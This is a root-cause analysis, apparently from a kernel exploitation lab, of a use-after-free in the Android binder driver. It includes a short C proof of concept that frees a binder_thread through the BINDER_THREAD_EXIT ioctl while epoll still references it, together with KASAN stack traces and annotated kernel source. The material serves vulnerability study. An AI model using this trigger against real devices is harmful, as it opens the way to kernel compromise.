Android Kernel Exploitation Analysis

Root Cause Analysis

Revisiting Crash

The crash log from the lab lets us read the call stacks. The PoC that triggers the crash is:

#include <fcntl.h>

#include <sys/epoll.h>

#include <sys/ioctl.h>

#include <stdio.h>

#define BINDER_THREAD_EXIT 0x40046208ul

int main() {

int fd, epfd;

struct epoll_event event = {.events = EPOLLIN};

fd = open("/dev/binder", O_RDONLY);

epfd = epoll_create(1000);

epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &event);

ioctl(fd, BINDER_THREAD_EXIT, NULL);

}

Allocation



[< none >] save_stack_trace+0x16/0x18 arch/x86/kernel/stacktrace.c:59

[< inline >] save_stack mm/kasan/common.c:76

[< inline >] set_track mm/kasan/common.c:85

[< none >] __kasan_kmalloc+0x133/0x1cc mm/kasan/common.c:501

[< none >] kasan_kmalloc+0x9/0xb mm/kasan/common.c:515

[< none >] kmem_cache_alloc_trace+0x1bd/0x26f mm/slub.c:2819

[< inline >] kmalloc include/linux/slab.h:488

[< inline >] kzalloc include/linux/slab.h:661

[< none >] binder_get_thread+0x166/0x6db drivers/android/binder.c:4677

[< none >] binder_poll+0x4c/0x1c2 drivers/android/binder.c:4805

[< inline >] ep_item_poll fs/eventpoll.c:888

[< inline >] ep_insert fs/eventpoll.c:1476

[< inline >] SYSC_epoll_ctl fs/eventpoll.c:2128

[< none >] SyS_epoll_ctl+0x1558/0x24f0 fs/eventpoll.c:2014

[< none >] do_syscall_64+0x19e/0x225 arch/x86/entry/common.c:292

[< none >] entry_SYSCALL_64_after_hwframe+0x3d/0xa2 arch/x86/entry/entry_64.S:233

crash-log-allocation-stack-trace

epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &event);

Free



[< none >] save_stack_trace+0x16/0x18 arch/x86/kernel/stacktrace.c:59

[< inline >] save_stack mm/kasan/common.c:76

[< inline >] set_track mm/kasan/common.c:85

[< none >] __kasan_slab_free+0x18f/0x23f mm/kasan/common.c:463

[< none >] kasan_slab_free+0xe/0x10 mm/kasan/common.c:471

[< inline >] slab_free_hook mm/slub.c:1407

[< inline >] slab_free_freelist_hook mm/slub.c:1458

[< inline >] slab_free mm/slub.c:3039

[< none >] kfree+0x193/0x5b3 mm/slub.c:3976

[< inline >] binder_free_thread drivers/android/binder.c:4705

[< none >] binder_thread_dec_tmpref+0x192/0x1d9 drivers/android/binder.c:2053

[< none >] binder_thread_release+0x464/0x4bd drivers/android/binder.c:4794

[< none >] binder_ioctl+0x48a/0x101c drivers/android/binder.c:5062

[< none >] do_vfs_ioctl+0x608/0x106a fs/ioctl.c:46

[< inline >] SYSC_ioctl fs/ioctl.c:701

[< none >] SyS_ioctl+0x75/0xa4 fs/ioctl.c:692

[< none >] do_syscall_64+0x19e/0x225 arch/x86/entry/common.c:292

[< none >] entry_SYSCALL_64_after_hwframe+0x3d/0xa2 arch/x86/entry/entry_64.S:233

crash-log-free-stack-trace

ioctl(fd, BINDER_THREAD_EXIT, NULL);

- binder_thread

- binder_free_thread (drivers/android/binder.c)

struct binder_thread {

struct binder_proc *proc;

struct rb_node rb_node;

struct list_head waiting_thread_node;

int pid;

int looper; /* only modified by this thread */

bool looper_need_return; /* can be written by other thread */

struct binder_transaction *transaction_stack;

struct list_head todo;

struct binder_error return_error;

struct binder_error reply_error;

wait_queue_head_t wait;

struct binder_stats stats;

atomic_t tmp_ref;

bool is_dead;

};

static void binder_free_thread(struct binder_thread *thread)

{

BUG_ON(!list_empty(&thread->todo));

binder_stats_deleted(BINDER_STAT_THREAD);

binder_proc_dec_tmpref(thread->proc);

kfree(thread);

}

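Following the call chain, binder_free_thread releases the binder_thread with kfree. Any reference to that thread that is still held elsewhere becomes a dangling pointer, and that is where the vulnerability shows up.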

Use



[< none >] _raw_spin_lock_irqsave+0x3a/0x5d kernel/locking/spinlock.c:160

[< none >] remove_wait_queue+0x27/0x122 kernel/sched/wait.c:50

?[< none >] fsnotify_unmount_inodes+0x1e8/0x1e8 fs/notify/fsnotify.c:99

[< inline >] ep_remove_wait_queue fs/eventpoll.c:612

[< none >] ep_unregister_pollwait+0x160/0x1bd fs/eventpoll.c:630

[< none >] ep_free+0x8b/0x181 fs/eventpoll.c:847

?[< none >] ep_eventpoll_poll+0x228/0x228 fs/eventpoll.c:942

[< none >] ep_eventpoll_release+0x48/0x54 fs/eventpoll.c:879

[< none >] __fput+0x1f2/0x51d fs/file_table.c:210

[< none >] ____fput+0x15/0x18 fs/file_table.c:244

[< none >] task_work_run+0x127/0x154 kernel/task_work.c:113

[< inline >] exit_task_work include/linux/task_work.h:22

[< none >] do_exit+0x818/0x2384 kernel/exit.c:875

?[< none >] mm_update_next_owner+0x52f/0x52f kernel/exit.c:468

[< none >] do_group_exit+0x12c/0x24b kernel/exit.c:978

?[< inline >] spin_unlock_irq include/linux/spinlock.h:367

?[< none >] do_group_exit+0x24b/0x24b kernel/exit.c:975

[< none >] SYSC_exit_group+0x17/0x17 kernel/exit.c:989

[< none >] SyS_exit_group+0x14/0x14 kernel/exit.c:987

[< none >] do_syscall_64+0x19e/0x225 arch/x86/entry/common.c:292

[< none >] entry_SYSCALL_64_after_hwframe+0x3d/0xa2 arch/x86/entry/entry_64.S:233

crash-log-use-stack-trace

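The PoC contains no line that calls SyS_exit_group. The exit_group system call is issued implicitly when the process terminates, here when main returns, and the stack trace shows the epoll file being released on that exit path.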

Static Analysis

The analysis focuses on three questions.

- Why is binder_thread allocated?

- Why is binder_thread freed?

- Why is the freed binder_thread used?

open

- file_operations

- binder.c

fd = open("/dev/binder", O_RDONLY);

static const struct file_operations binder_fops = {

.owner = THIS_MODULE,

.poll = binder_poll,

.unlocked_ioctl = binder_ioctl,

.compat_ioctl = binder_ioctl,

.mmap = binder_mmap,

.open = binder_open,

.flush = binder_flush,

.release = binder_release,

};

static int binder_open(struct inode *nodp, struct file *filp)

{

struct binder_proc *proc;

struct binder_device *binder_dev;

binder_debug(BINDER_DEBUG_OPEN_CLOSE, "binder_open: %d:%d\n",

current->group_leader->pid, current->pid);

proc = kzalloc(sizeof(*proc), GFP_KERNEL);

if (proc == NULL)

return -ENOMEM;

spin_lock_init(&proc->inner_lock);

spin_lock_init(&proc->outer_lock);

get_task_struct(current->group_leader);

proc->tsk = current->group_leader;

mutex_init(&proc->files_lock);

INIT_LIST_HEAD(&proc->todo);

proc->default_priority = task_nice(current);

binder_dev = container_of(filp->private_data, struct binder_device,

miscdev);

proc->context = &binder_dev->context;

binder_alloc_init(&proc->alloc);

binder_stats_created(BINDER_STAT_PROC);

proc->pid = current->group_leader->pid;

INIT_LIST_HEAD(&proc->delivered_death);

INIT_LIST_HEAD(&proc->waiting_threads);

filp->private_data = proc;

mutex_lock(&binder_procs_lock);

hlist_add_head(&proc->proc_node, &binder_procs);

mutex_unlock(&binder_procs_lock);

if (binder_debugfs_dir_entry_proc) {

char strbuf[11];

snprintf(strbuf, sizeof(strbuf), "%u", proc->pid);

/*

* proc debug entries are shared between contexts, so

* this will fail if the process tries to open the driver

* again with a different context. The priting code will

* anyway print all contexts that a given PID has, so this

* is not a problem.

*/

proc->debugfs_entry = debugfs_create_file(strbuf, S_IRUGO,

binder_debugfs_dir_entry_proc,

(void *)(unsigned long)proc->pid,

&binder_proc_fops);

}

return 0;

}

- The open system call on /dev/binder is handled by the binder_open function.

- binder_open allocates a binder_proc data structure and assigns it to filp->private_data.

epoll_create

epfd = epoll_create(1000);

- eventpoll.c

- SYSCALL_DEFINE1 , SYSCALL_DEFINE2

- asmlinkage

#define SYSCALL_DEFINE1(name, ...) SYSCALL_DEFINEx(1, _##name, __VA_ARGS__)

SYSCALL_DEFINE1(epoll_create, int, size)

{

if (size <= 0)

return -EINVAL;

return sys_epoll_create1(0);

}

/*

* Open an eventpoll file descriptor.

*/

SYSCALL_DEFINE1(epoll_create1, int, flags)

{

int error, fd;

struct eventpoll *ep = NULL;

struct file *file;

/* Check the EPOLL_* constant for consistency. */

BUILD_BUG_ON(EPOLL_CLOEXEC != O_CLOEXEC);

if (flags & ~EPOLL_CLOEXEC)

return -EINVAL;

/*

* Create the internal data structure ("struct eventpoll").

*/

error = ep_alloc(&ep);

if (error < 0)

return error;

/*

* Creates all the items needed to setup an eventpoll file. That is,

* a file structure and a free file descriptor.

*/

fd = get_unused_fd_flags(O_RDWR | (flags & O_CLOEXEC));

if (fd < 0) {

error = fd;

goto out_free_ep;

}

file = anon_inode_getfile("[eventpoll]", &eventpoll_fops, ep,

O_RDWR | (flags & O_CLOEXEC));

if (IS_ERR(file)) {

error = PTR_ERR(file);

goto out_free_fd;

}

ep->file = file;

fd_install(fd, file);

return fd;

out_free_fd:

put_unused_fd(fd);

out_free_ep:

ep_free(ep);

return error;

}

static int ep_alloc(struct eventpoll **pep)

{

int error;

struct user_struct *user;

struct eventpoll *ep;

user = get_current_user();

error = -ENOMEM;

ep = kzalloc(sizeof(*ep), GFP_KERNEL);

if (unlikely(!ep))

goto free_uid;

spin_lock_init(&ep->lock);

mutex_init(&ep->mtx);

init_waitqueue_head(&ep->wq);

init_waitqueue_head(&ep->poll_wait);

INIT_LIST_HEAD(&ep->rdllist);

ep->rbr = RB_ROOT_CACHED;

ep->ovflist = EP_UNACTIVE_PTR;

ep->user = user;

*pep = ep;

return 0;

free_uid:

free_uid(user);

return error;

}

/*

* This structure is stored inside the "private_data" member of the file

* structure and represents the main data structure for the eventpoll

* interface.

*/

struct eventpoll {

/* Protect the access to this structure */

spinlock_t lock;

/*

* This mutex is used to ensure that files are not removed

* while epoll is using them. This is held during the event

* collection loop, the file cleanup path, the epoll file exit

* code and the ctl operations.

*/

struct mutex mtx;

/* Wait queue used by sys_epoll_wait() */

wait_queue_head_t wq;

/* Wait queue used by file->poll() */

wait_queue_head_t poll_wait;

/* List of ready file descriptors */

struct list_head rdllist;

/* RB tree root used to store monitored fd structs */

struct rb_root_cached rbr;

/*

* This is a single linked list that chains all the "struct epitem" that

* happened while transferring ready events to userspace w/out

* holding ->lock.

*/

struct epitem *ovflist;

/* wakeup_source used when ep_scan_ready_list is running */

struct wakeup_source *ws;

/* The user that created the eventpoll descriptor */

struct user_struct *user;

struct file *file;

/* used to optimize loop detection check */

int visited;

struct list_head visited_list_link;

#ifdef CONFIG_NET_RX_BUSY_POLL

/* used to track busy poll napi_id */

unsigned int napi_id;

#endif

};

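- epoll_create checks that size is positive and then calls sys_epoll_create1; the size value is not used for anything else.

- sys_epoll_create1 calls ep_alloc to allocate and initialize the eventpoll, sets ep->file = file, and finally returns the epoll file descriptor fd.

- ep_alloc allocates struct eventpoll, initializes the wait queues wq and poll_wait, and initializes the red-black tree root rbr.

- struct eventpoll is the main data structure of the event polling subsystem.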

epoll_ctl

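The call takes fd (the descriptor returned by opening binder), epfd (the descriptor of the file that holds the allocated eventpoll), and the event structure set up by the PoC.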

epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &event);

eventpoll.c

/*

* The following function implements the controller interface for

* the eventpoll file that enables the insertion/removal/change of

* file descriptors inside the interest set.

*/

SYSCALL_DEFINE4(epoll_ctl, int, epfd, int, op, int, fd,

struct epoll_event __user *, event)

{

int error;

int full_check = 0;

struct fd f, tf;

struct eventpoll *ep;

struct epitem *epi;

struct epoll_event epds;

struct eventpoll *tep = NULL;

error = -EFAULT;

if (ep_op_has_event(op) &&

copy_from_user(&epds, event, sizeof(struct epoll_event)))

goto error_return;

error = -EBADF;

f = fdget(epfd);

if (!f.file)

goto error_return;

/* Get the "struct file *" for the target file */

tf = fdget(fd);

if (!tf.file)

goto error_fput;

/* The target file descriptor must support poll */

error = -EPERM;

if (!tf.file->f_op->poll)

goto error_tgt_fput;

/* Check if EPOLLWAKEUP is allowed */

if (ep_op_has_event(op))

ep_take_care_of_epollwakeup(&epds);

/*

* We have to check that the file structure underneath the file descriptor

* the user passed to us _is_ an eventpoll file. And also we do not permit

* adding an epoll file descriptor inside itself.

*/

error = -EINVAL;

if (f.file == tf.file || !is_file_epoll(f.file))

goto error_tgt_fput;

/*

* epoll adds to the wakeup queue at EPOLL_CTL_ADD time only,

* so EPOLLEXCLUSIVE is not allowed for a EPOLL_CTL_MOD operation.

* Also, we do not currently supported nested exclusive wakeups.

*/

if (ep_op_has_event(op) && (epds.events & EPOLLEXCLUSIVE)) {

if (op == EPOLL_CTL_MOD)

goto error_tgt_fput;

if (op == EPOLL_CTL_ADD && (is_file_epoll(tf.file) ||

(epds.events & ~EPOLLEXCLUSIVE_OK_BITS)))

goto error_tgt_fput;

}

/*

* At this point it is safe to assume that the "private_data" contains

* our own data structure.

*/

ep = f.file->private_data;

/*

* When we insert an epoll file descriptor, inside another epoll file

* descriptor, there is the change of creating closed loops, which are

* better be handled here, than in more critical paths. While we are

* checking for loops we also determine the list of files reachable

* and hang them on the tfile_check_list, so we can check that we

* haven't created too many possible wakeup paths.

*

* We do not need to take the global 'epumutex' on EPOLL_CTL_ADD when

* the epoll file descriptor is attaching directly to a wakeup source,

* unless the epoll file descriptor is nested. The purpose of taking the

* 'epmutex' on add is to prevent complex toplogies such as loops and

* deep wakeup paths from forming in parallel through multiple

* EPOLL_CTL_ADD operations.

*/

mutex_lock_nested(&ep->mtx, 0);

if (op == EPOLL_CTL_ADD) {

if (!list_empty(&f.file->f_ep_links) ||

is_file_epoll(tf.file)) {

full_check = 1;

mutex_unlock(&ep->mtx);

mutex_lock(&epmutex);

if (is_file_epoll(tf.file)) {

error = -ELOOP;

if (ep_loop_check(ep, tf.file) != 0) {

clear_tfile_check_list();

goto error_tgt_fput;

}

} else

list_add(&tf.file->f_tfile_llink,

&tfile_check_list);

mutex_lock_nested(&ep->mtx, 0);

if (is_file_epoll(tf.file)) {

tep = tf.file->private_data;

mutex_lock_nested(&tep->mtx, 1);

}

}

}

/*

* Try to lookup the file inside our RB tree, Since we grabbed "mtx"

* above, we can be sure to be able to use the item looked up by

* ep_find() till we release the mutex.

*/

epi = ep_find(ep, tf.file, fd);

error = -EINVAL;

switch (op) {

case EPOLL_CTL_ADD:

if (!epi) {

epds.events |= POLLERR | POLLHUP;

error = ep_insert(ep, &epds, tf.file, fd, full_check);

} else

error = -EEXIST;

if (full_check)

clear_tfile_check_list();

break;

case EPOLL_CTL_DEL:

if (epi)

error = ep_remove(ep, epi);

else

error = -ENOENT;

break;

case EPOLL_CTL_MOD:

if (epi) {

if (!(epi->event.events & EPOLLEXCLUSIVE)) {

epds.events |= POLLERR | POLLHUP;

error = ep_modify(ep, epi, &epds);

}

} else

error = -ENOENT;

break;

}

if (tep != NULL)

mutex_unlock(&tep->mtx);

mutex_unlock(&ep->mtx);

error_tgt_fput:

if (full_check)

mutex_unlock(&epmutex);

fdput(tf);

error_fput:

fdput(f);

error_return:

return error;

}

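- Copies the epoll_event from user space into kernel space.

- Looks up the struct file pointers for fd and epfd.

- Takes the eventpoll pointer from the private_data of epfd's file.

- Calls ep_find to look in the eventpoll's red-black tree for the epitem that matches fd.

- If no epitem is found, calls ep_insert to allocate one and link it into the rbr member of the eventpoll structure.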

/*

* Each file descriptor added to the eventpoll interface will

* have an entry of this type linked to the "rbr" RB tree.

* Avoid increasing the size of this struct, there can be many thousands

* of these on a server and we do not want this to take another cache line.

*/

struct epitem {

union {

/* RB tree node links this structure to the eventpoll RB tree */

struct rb_node rbn;

/* Used to free the struct epitem */

struct rcu_head rcu;

};

/* List header used to link this structure to the eventpoll ready list */

struct list_head rdllink;

/*

* Works together "struct eventpoll"->ovflist in keeping the

* single linked chain of items.

*/

struct epitem *next;

/* The file descriptor information this item refers to */

struct epoll_filefd ffd;

/* Number of active wait queue attached to poll operations */

int nwait;

/* List containing poll wait queues */

struct list_head pwqlist;

/* The "container" of this item */

struct eventpoll *ep;

/* List header used to link this item to the "struct file" items list */

struct list_head fllink;

/* wakeup_source used when EPOLLWAKEUP is set */

struct wakeup_source __rcu *ws;

/* The structure that describe the interested events and the source fd */

struct epoll_event event;

};



This diagram shows how the epitem structure is linked to the eventpoll structure.

/*

* Must be called with "mtx" held.

*/

static int ep_insert(struct eventpoll *ep, struct epoll_event *event,

struct file *tfile, int fd, int full_check)

{

int error, revents, pwake = 0;

unsigned long flags;

long user_watches;

struct epitem *epi;

struct ep_pqueue epq;

user_watches = atomic_long_read(&ep->user->epoll_watches);

if (unlikely(user_watches >= max_user_watches))

return -ENOSPC;

if (!(epi = kmem_cache_alloc(epi_cache, GFP_KERNEL)))

return -ENOMEM;

/* Item initialization follow here ... */

INIT_LIST_HEAD(&epi->rdllink);

INIT_LIST_HEAD(&epi->fllink);

INIT_LIST_HEAD(&epi->pwqlist);

epi->ep = ep;

ep_set_ffd(&epi->ffd, tfile, fd);

epi->event = *event;

epi->nwait = 0;

epi->next = EP_UNACTIVE_PTR;

if (epi->event.events & EPOLLWAKEUP) {

error = ep_create_wakeup_source(epi);

if (error)

goto error_create_wakeup_source;

} else {

RCU_INIT_POINTER(epi->ws, NULL);

}

/* Initialize the poll table using the queue callback */

epq.epi = epi;

init_poll_funcptr(&epq.pt, ep_ptable_queue_proc);

/*

* Attach the item to the poll hooks and get current event bits.

* We can safely use the file* here because its usage count has

* been increased by the caller of this function. Note that after

* this operation completes, the poll callback can start hitting

* the new item.

*/

revents = ep_item_poll(epi, &epq.pt);

/*

* We have to check if something went wrong during the poll wait queue

* install process. Namely an allocation for a wait queue failed due

* high memory pressure.

*/

error = -ENOMEM;

if (epi->nwait < 0)

goto error_unregister;

/* Add the current item to the list of active epoll hook for this file */

spin_lock(&tfile->f_lock);

list_add_tail_rcu(&epi->fllink, &tfile->f_ep_links);

spin_unlock(&tfile->f_lock);

/*

* Add the current item to the RB tree. All RB tree operations are

* protected by "mtx", and ep_insert() is called with "mtx" held.

*/

ep_rbtree_insert(ep, epi);

/* now check if we've created too many backpaths */

error = -EINVAL;

if (full_check && reverse_path_check())

goto error_remove_epi;

/* We have to drop the new item inside our item list to keep track of it */

spin_lock_irqsave(&ep->lock, flags);

/* record NAPI ID of new item if present */

ep_set_busy_poll_napi_id(epi);

/* If the file is already "ready" we drop it inside the ready list */

if ((revents & event->events) && !ep_is_linked(&epi->rdllink)) {

list_add_tail(&epi->rdllink, &ep->rdllist);

ep_pm_stay_awake(epi);

/* Notify waiting tasks that events are available */

if (waitqueue_active(&ep->wq))

wake_up_locked(&ep->wq);

if (waitqueue_active(&ep->poll_wait))

pwake++;

}

spin_unlock_irqrestore(&ep->lock, flags);

atomic_long_inc(&ep->user->epoll_watches);

/* We have to call this outside the lock */

if (pwake)

ep_poll_safewake(&ep->poll_wait);

return 0;

error_remove_epi:

spin_lock(&tfile->f_lock);

list_del_rcu(&epi->fllink);

spin_unlock(&tfile->f_lock);

rb_erase_cached(&epi->rbn, &ep->rbr);

error_unregister:

ep_unregister_pollwait(ep, epi);

/*

* We need to do this because an event could have been arrived on some

* allocated wait queue. Note that we don't care about the ep->ovflist

* list, since that is used/cleaned only inside a section bound by "mtx".

* And ep_insert() is called with "mtx" held.

*/

spin_lock_irqsave(&ep->lock, flags);

if (ep_is_linked(&epi->rdllink))

list_del_init(&epi->rdllink);

spin_unlock_irqrestore(&ep->lock, flags);

wakeup_source_unregister(ep_wakeup_source(epi));

error_create_wakeup_source:

kmem_cache_free(epi_cache, epi);

return error;

}

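- Declares a temporary ep_pqueue structure (epq).

- Allocates and initializes an epitem structure.

- The epi->pwqlist member is used to link poll wait queues.

- Calls ep_set_ffd to set ffd->file = file and ffd->fd = fd, which store binder's struct file pointer and its descriptor.

- Sets epq.epi to point to epi.

- Sets epq.pt._qproc to the address of the ep_ptable_queue_proc callback.

- Calls ep_item_poll with epi and &epq.pt (the poll table) as arguments.

- Calls ep_rbtree_insert to link the epitem into the red-black tree root of the eventpoll structure.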

static inline unsigned int ep_item_poll(struct epitem *epi, poll_table *pt)

{

pt->_key = epi->event.events;

return epi->ffd.file->f_op->poll(epi->ffd.file, pt) & epi->event.events;

}

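- Calls the poll function from the file's f_op, passing binder's struct file pointer and the poll_table pointer.

- At this point execution crosses from the epoll subsystem into the binder subsystem.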

/drivers/android/binder.c

static const struct file_operations binder_fops = {

.owner = THIS_MODULE,

.poll = binder_poll,

.unlocked_ioctl = binder_ioctl,

.compat_ioctl = binder_ioctl,

.mmap = binder_mmap,

.open = binder_open,

.flush = binder_flush,

.release = binder_release,

};

The poll operation is handled by binder_poll.

static unsigned int binder_poll(struct file *filp,

struct poll_table_struct *wait)

{

struct binder_proc *proc = filp->private_data;

struct binder_thread *thread = NULL;

bool wait_for_proc_work;

thread = binder_get_thread(proc);

if (!thread)

return POLLERR;

binder_inner_proc_lock(thread->proc);

thread->looper |= BINDER_LOOPER_STATE_POLL;

wait_for_proc_work = binder_available_for_proc_work_ilocked(thread);

binder_inner_proc_unlock(thread->proc);

poll_wait(filp, &thread->wait, wait);

if (binder_has_work(thread, wait_for_proc_work))

return POLLIN;

return 0;

}

- Gets the binder_proc pointer from filp->private_data.

- Calls binder_get_thread with the binder_proc pointer.

- Calls poll_wait with binder's file pointer, &thread->wait (a pointer to a wait_queue_head_t), and the poll_table_struct pointer.

static struct binder_thread *binder_get_thread(struct binder_proc *proc)

{

struct binder_thread *thread;

struct binder_thread *new_thread;

binder_inner_proc_lock(proc);

thread = binder_get_thread_ilocked(proc, NULL);

binder_inner_proc_unlock(proc);

if (!thread) {

new_thread = kzalloc(sizeof(*thread), GFP_KERNEL);

if (new_thread == NULL)

return NULL;

binder_inner_proc_lock(proc);

thread = binder_get_thread_ilocked(proc, new_thread);

binder_inner_proc_unlock(proc);

if (thread != new_thread)

kfree(new_thread);

}

return thread;

}

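- Calls binder_get_thread_ilocked to try to find an existing binder_thread in proc->threads.rb_node.

- If none exists, allocates a new binder_thread with kzalloc. This is the allocation recorded in the allocation stack trace (binder_get_thread, drivers/android/binder.c:4677).

- Finally calls binder_get_thread_ilocked again, which initializes the newly allocated binder_thread and links it into proc->threads.rb_node, a red-black tree node.

- This binder_thread is the object that later becomes linked to the epitem created in ep_insert.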

static inline void poll_wait(struct file * filp, wait_queue_head_t * wait_address, poll_table *p)

{

if (p && p->_qproc && wait_address)

p->_qproc(filp, wait_address, p);

}

- Calls the callback stored in p->_qproc, passing binder's file structure pointer, the wait_queue_head_t pointer, and the poll_table pointer.

- As seen in ep_insert, p->_qproc was set to ep_ptable_queue_proc.

- Execution now returns from the binder subsystem to the epoll subsystem.

- Open eventpoll.c and look at ep_ptable_queue_proc.

/*

* This is the callback that is used to add our wait queue to the

* target file wakeup lists.

*/

static void ep_ptable_queue_proc(struct file *file, wait_queue_head_t *whead,

poll_table *pt)

{

struct epitem *epi = ep_item_from_epqueue(pt);

struct eppoll_entry *pwq;

if (epi->nwait >= 0 && (pwq = kmem_cache_alloc(pwq_cache, GFP_KERNEL))) {

init_waitqueue_func_entry(&pwq->wait, ep_poll_callback);

pwq->whead = whead;

pwq->base = epi;

if (epi->event.events & EPOLLEXCLUSIVE)

add_wait_queue_exclusive(whead, &pwq->wait);

else

add_wait_queue(whead, &pwq->wait);

list_add_tail(&pwq->llink, &epi->pwqlist);

epi->nwait++;

} else {

/* We have to signal that an error occurred */

epi->nwait = -1;

}

}

- Calls ep_item_from_epqueue to get the epitem pointer from the poll_table.

- Allocates and initializes an eppoll_entry.

- Sets eppoll_entry->whead to the wait_queue_head_t pointer passed in by binder_poll, which points to binder_thread->wait.

- Calls add_wait_queue to link eppoll_entry->wait into binder_thread->wait.

- Calls list_add_tail to link eppoll_entry->llink into epitem->pwqlist.

Note:

binder_thread->wait is referenced from two places. The first is eppoll_entry->whead, which points to it, and the second is eppoll_entry->wait, which is linked into its wait queue.

struct eppoll_entry {

/* List header used to link this structure to the "struct epitem" */

struct list_head llink;

/* The "base" pointer is set to the container "struct epitem" */

struct epitem *base;

/*

* Wait queue item that will be linked to the target file wait

* queue head.

*/

wait_queue_entry_t wait;

/* The wait queue head that linked the "wait" wait queue item */

wait_queue_head_t *whead;

};



This diagram is a simplified call graph of how the binder_thread structure is allocated and linked to the epoll subsystem.



This diagram shows how the eventpoll structure is connected to the binder_thread structure.

ioctl

ioctl(fd, BINDER_THREAD_EXIT, NULL);

- binder.c

static const struct file_operations binder_fops = {

.owner = THIS_MODULE,

.poll = binder_poll,

.unlocked_ioctl = binder_ioctl,

.compat_ioctl = binder_ioctl,

.mmap = binder_mmap,

.open = binder_open,

.flush = binder_flush,

.release = binder_release,

};

- Both unlocked_ioctl and compat_ioctl are handled by binder_ioctl.

- The PoC passes BINDER_THREAD_EXIT as the command.

static long binder_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)

{

int ret;

struct binder_proc *proc = filp->private_data;

struct binder_thread *thread;

unsigned int size = _IOC_SIZE(cmd);

void __user *ubuf = (void __user *)arg;

/*pr_info("binder_ioctl: %d:%d %x %lx\n",

proc->pid, current->pid, cmd, arg);*/

binder_selftest_alloc(&proc->alloc);

trace_binder_ioctl(cmd, arg);

ret = wait_event_interruptible(binder_user_error_wait, binder_stop_on_user_error < 2);

if (ret)

goto err_unlocked;

thread = binder_get_thread(proc);

if (thread == NULL) {

ret = -ENOMEM;

goto err;

}

switch (cmd) {

case BINDER_WRITE_READ:

ret = binder_ioctl_write_read(filp, cmd, arg, thread);

if (ret)

goto err;

break;

case BINDER_SET_MAX_THREADS: {

int max_threads;

if (copy_from_user(&max_threads, ubuf,

sizeof(max_threads))) {

ret = -EINVAL;

goto err;

}

binder_inner_proc_lock(proc);

proc->max_threads = max_threads;

binder_inner_proc_unlock(proc);

break;

}

case BINDER_SET_CONTEXT_MGR:

ret = binder_ioctl_set_ctx_mgr(filp);

if (ret)

goto err;

break;

case BINDER_THREAD_EXIT:

binder_debug(BINDER_DEBUG_THREADS, "%d:%d exit\n",

proc->pid, thread->pid);

binder_thread_release(proc, thread);

thread = NULL;

break;

case BINDER_VERSION: {

struct binder_version __user *ver = ubuf;

if (size != sizeof(struct binder_version)) {

ret = -EINVAL;

goto err;

}

if (put_user(BINDER_CURRENT_PROTOCOL_VERSION,

&ver->protocol_version)) {

ret = -EINVAL;

goto err;

}

break;

}

case BINDER_GET_NODE_DEBUG_INFO: {

struct binder_node_debug_info info;

if (copy_from_user(&info, ubuf, sizeof(info))) {

ret = -EFAULT;

goto err;

}

ret = binder_ioctl_get_node_debug_info(proc, &info);

if (ret < 0)

goto err;

if (copy_to_user(ubuf, &info, sizeof(info))) {

ret = -EFAULT;

goto err;

}

break;

}

default:

ret = -EINVAL;

goto err;

}

ret = 0;

err:

if (thread)

thread->looper_need_return = false;

wait_event_interruptible(binder_user_error_wait, binder_stop_on_user_error < 2);

if (ret && ret != -ERESTARTSYS)

pr_info("%d:%d ioctl %x %lx returned %d\n", proc->pid, current->pid, cmd, arg, ret);

err_unlocked:

trace_binder_ioctl_done(ret);

return ret;

}

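- Gets the binder_thread pointer from the binder_proc structure by calling binder_get_thread.

- For BINDER_THREAD_EXIT, calls binder_thread_release with the binder_proc pointer and the binder_thread pointer.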

static int binder_thread_release(struct binder_proc *proc,

struct binder_thread *thread)

{

struct binder_transaction *t;

struct binder_transaction *send_reply = NULL;

int active_transactions = 0;

struct binder_transaction *last_t = NULL;

binder_inner_proc_lock(thread->proc);

/*

* take a ref on the proc so it survives

* after we remove this thread from proc->threads.

* The corresponding dec is when we actually

* free the thread in binder_free_thread()

*/

proc->tmp_ref++;

/*

* take a ref on this thread to ensure it

* survives while we are releasing it

*/

atomic_inc(&thread->tmp_ref);

rb_erase(&thread->rb_node, &proc->threads);

t = thread->transaction_stack;

if (t) {

spin_lock(&t->lock);

if (t->to_thread == thread)

send_reply = t;

}

thread->is_dead = true;

while (t) {

last_t = t;

active_transactions++;

binder_debug(BINDER_DEBUG_DEAD_TRANSACTION,

"release %d:%d transaction %d %s, still active\n",

proc->pid, thread->pid,

t->debug_id,

(t->to_thread == thread) ? "in" : "out");

if (t->to_thread == thread) {

t->to_proc = NULL;

t->to_thread = NULL;

if (t->buffer) {

t->buffer->transaction = NULL;

t->buffer = NULL;

}

t = t->to_parent;

} else if (t->from == thread) {

t->from = NULL;

t = t->from_parent;

} else

BUG();

spin_unlock(&last_t->lock);

if (t)

spin_lock(&t->lock);

}

/*

* If this thread used poll, make sure we remove the waitqueue

* from any epoll data structures holding it with POLLFREE.

* waitqueue_active() is safe to use here because we're holding

* the inner lock.

*/

if ((thread->looper & BINDER_LOOPER_STATE_POLL) &&

waitqueue_active(&thread->wait)) {

wake_up_poll(&thread->wait, POLLHUP | POLLFREE);

}

binder_inner_proc_unlock(thread->proc);

/*

* This is needed to avoid races between wake_up_poll() above and

* and ep_remove_waitqueue() called for other reasons (eg the epoll file

* descriptor being closed); ep_remove_waitqueue() holds an RCU read

* lock, so we can be sure it's done after calling synchronize_rcu().

*/

if (thread->looper & BINDER_LOOPER_STATE_POLL)

synchronize_rcu();

if (send_reply)

binder_send_failed_reply(send_reply, BR_DEAD_REPLY);

binder_release_work(proc, &thread->todo);

binder_thread_dec_tmpref(thread);

return active_transactions;

}

- Calls `binder_thread_dec_tmpref`, passing the `binder_thread` pointer.

/**

* binder_thread_dec_tmpref() - decrement thread->tmp_ref

* @thread: thread to decrement

*

* A thread needs to be kept alive while being used to create or

* handle a transaction. binder_get_txn_from() is used to safely

* extract t->from from a binder_transaction and keep the thread

* indicated by t->from from being freed. When done with that

* binder_thread, this function is called to decrement the

* tmp_ref and free if appropriate (thread has been released

* and no transaction being processed by the driver)

*/

static void binder_thread_dec_tmpref(struct binder_thread *thread)

{

/*

* atomic is used to protect the counter value while

* it cannot reach zero or thread->is_dead is false

*/

binder_inner_proc_lock(thread->proc);

atomic_dec(&thread->tmp_ref);

if (thread->is_dead && !atomic_read(&thread->tmp_ref)) {

binder_inner_proc_unlock(thread->proc);

binder_free_thread(thread);

return;

}

binder_inner_proc_unlock(thread->proc);

}

